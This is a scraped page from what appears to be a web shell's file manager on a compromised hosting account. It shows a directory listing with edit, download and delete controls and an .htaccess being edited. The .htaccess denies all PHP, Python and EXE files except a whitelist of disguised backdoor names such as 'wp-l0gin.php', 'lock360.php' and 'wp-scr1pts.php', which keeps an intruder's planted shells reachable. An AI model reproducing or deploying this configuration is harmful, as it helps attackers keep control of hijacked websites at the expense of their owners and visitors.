/
home
/
techb158
/
exp.abdallabala.com
/
system
/
/home/techb158/exp.abdallabala.com/system
mkdir
upload
Name
Size
Mode
Actions
data/
-
0755
rm
.htaccess
533
0644
edit
dl
rm
index.html
112
0644
edit
dl
rm
index.php
7140
0644
edit
dl
rm
Edit:
/home/techb158/exp.abdallabala.com/system/.htaccess
(533B)
<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>
Save
Order allow,deny Deny from all
Order allow,deny Allow from all
RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L]